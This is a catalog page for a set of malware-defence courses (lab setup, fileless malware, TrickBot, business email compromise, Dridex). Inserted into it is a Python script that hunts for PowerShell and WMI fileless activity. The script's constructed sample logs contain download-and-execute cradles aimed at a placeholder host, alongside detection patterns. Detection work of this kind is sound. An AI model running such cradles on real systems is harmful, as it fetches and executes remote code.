Malware: Prevention, Detection, and Response

Authors: Tyler Hudak, Aaron Rosenmund, Josh Stroschein

What you will learn

  • Host detection and analysis of indicators
  • Network detection and analysis of indicators
  • Defensive techniques to combat the specific malware type

Pre-requisites

  • Security fundamentals
  • Malware Analysis skill path

In this container of content, you will learn how to analyze several specific types of malware for the purpose of identifying indicators that can be used for host and network detection.

Setting Up a Malware Analysis Lab

by Tyler Hudak

Nov 21, 2019 / 1h 25m

Description

In this course, Setting Up a Malware Analysis Lab, Aaron Rosenmund and Tyler Hudak discuss why you need your own malware analysis lab. A variety of roles outside of reverse engineering perform dynamic analysis of malware samples, and the ability to identify indicators of compromise makes you invaluable to incident response and security operations teams. You will learn not only how to build a virtual machine, but also how to modify the operating system so that the malware believes it is running on a real victim host and detonates, which tools to use, and how to run them in your own malware analysis lab.

Table of contents
  1. Course Overview
  2. Malware Analysis for Security Operations
  3. Creating a Sacrificial VM
  4. Passing Off Your Virtual Machine as the Real Deal
  5. Choosing Your Load Out
  6. Summary and Recap

Fileless Malware

by Tyler Hudak

Dec 18, 2018 / 1h 40m

Description

In this course, Hunting for Fileless Malware, Tyler Hudak and Aaron Rosenmund tackle what fileless malware is, why attackers use it, and the defensive strategies you can take to protect your organization from it. Learn about examples of fileless malware techniques, the abuse of native tools (PowerShell and WMI), and the types of defenses you can use. By the end of this course, you'll have a solid understanding of the various types of fileless malware and how best to defend against them.

Table of contents
  1. Course Overview
  2. What Is Fileless Malware?
  3. How Does Fileless Malware Work?
  4. Why Do Attackers Use These Techniques?
  5. Defenses Against Fileless Malware: Employing Proper Logging
  6. Defenses Against Fileless Malware: Utilizing Hunting Tools
  7. Conclusion
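Added example (not part of the course or its authors' material): a small Python hunting script that applies the course's two defenses, proper logging and hunting tools, to the PowerShell and WMI techniques it names. It runs over process-creation command lines of the kind command-line auditing produces, decodes any -EncodedCommand payload, and scores each line against a handful of fileless-activity indicators. The sample command lines, the indicator names, the scoring threshold, and the host name example.invalid are all constructed assumptions for this example, not data from the course.

```python
"""
Added example (not part of the course): hunting for PowerShell- and
WMI-based fileless activity in process-creation command lines.

The sample lines below are CONSTRUCTED for this example and are not real
telemetry; example.invalid is a reserved, non-routable host name.
"""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so
# -e, -ec, -en, -enc and -EncodedCommand all select the same parameter.
ENCODED_RE = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I
)

# Heuristic indicators; the names and the threshold below are this
# example's own choices, not a vendor or course ruleset.
INDICATORS = {
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I
    ),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "bypass_policy": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "wmi_process_create": re.compile(
        r"wmic(?:\.exe)?\s+process\s+call\s+create", re.I
    ),
}


def encode_for_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script text.
    Used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None  # truncated or non-base64 argument: nothing to decode
    return raw.decode("utf-16le", errors="replace")


def analyze_command_line(cmdline: str) -> dict:
    """Score one command line against the indicators, matching both the raw
    line and, when present, the decoded payload."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    if decoded is not None:
        hits.append("encoded_command")
    # PowerShell spawned through WMI is flagged on its own; otherwise require
    # two independent indicators so ordinary admin scripts stay out.
    suspicious = "wmi_process_create" in hits or len(hits) >= 2
    return {"line": cmdline, "decoded": decoded,
            "indicators": sorted(hits), "suspicious": suspicious}


def hunt(lines):
    """Analyze every command line, preserving input order."""
    return [analyze_command_line(line) for line in lines]


# Constructed download cradle used to build sample line 0 (not real malware).
CRADLE_SCRIPT = (
    "IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a')"
)

# Constructed sample command lines (not real logs).
SAMPLE_LOGS = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + encode_for_powershell(CRADLE_SCRIPT),
    'powershell.exe -Command "Get-ChildItem C:\\Users"',
    'wmic.exe process call create "powershell -w hidden -nop -c iex '
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/b')\"",
    "notepad.exe C:\\notes.txt",
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOGS):
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(f"{flag:10} {finding['indicators']}  {finding['line'][:60]}")
        if finding["decoded"]:
            print(f"{'':10} decoded: {finding['decoded']}")
```

Feed it the CommandLine field from whatever process-creation source you have enabled; the point of the course's logging module is that without command-line auditing there is nothing here to hunt over, and the encoded-command decode is what turns an opaque base64 blob into a searchable download cradle.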

Trickbot Banking Trojan

by Tyler Hudak

Nov 15, 2019 / 1h 29m

Description

In this course, Malware Analysis and Detection: TrickBot, Aaron Rosenmund and Tyler Hudak discuss TrickBot, a malware family widely used by attackers. By the end of this course, you will understand how TrickBot works, what it does to the computers it compromises, and which tools you can use to detect it on your hosts and network.

Table of contents
  1. Course Overview
  2. Introducing Trickbot
  3. Dynamic Analysis in the Lab
  4. Obtaining TrickBot Configuration and Files
  5. Detecting TrickBot Indicators on Your Network
  6. Summary and Recap

Business Email Compromise

by Aaron Rosenmund

Dec 9, 2020 / 1h 54m

Description

Though not technically malware in the sense of a malicious executable running on your systems, business email compromise is just as dangerous. Leveraging the cloud-based email services we have come to rely on, this family of attacks has become more advanced and is responsible for billions of dollars in losses. In this course, Business Email Compromise, you'll learn how these attacks work, who they target, and the techniques attackers use to turn compromised email access into stolen money and impersonation of their victims. By the end of this course, you will know effective and practical actions you can take to prevent, detect, and, if required, respond to a business email compromise attack.

Table of contents
  1. Course Overview
  2. Business Email Compromises: Prevention, Detection, and Response

Dridex Banking Trojan

by Josh Stroschein

May 11, 2021 / 1h 57m

Description

Cybersecurity is crucial when it comes to staying ahead of the newest threats. In this course, Dridex Banking Trojan, you'll learn about the banking Trojan Dridex. First, you'll explore how Dridex is delivered through phishing campaigns and social engineering, and ways to prevent initial infections. Next, you'll learn ways to detect Dridex on your networks. Finally, you'll learn how to respond when you have discovered an active infection. When you're finished with this course, you'll have the skills and knowledge of Dridex needed to disrupt

Table of contents
  1. Course Overview
  2. Dridex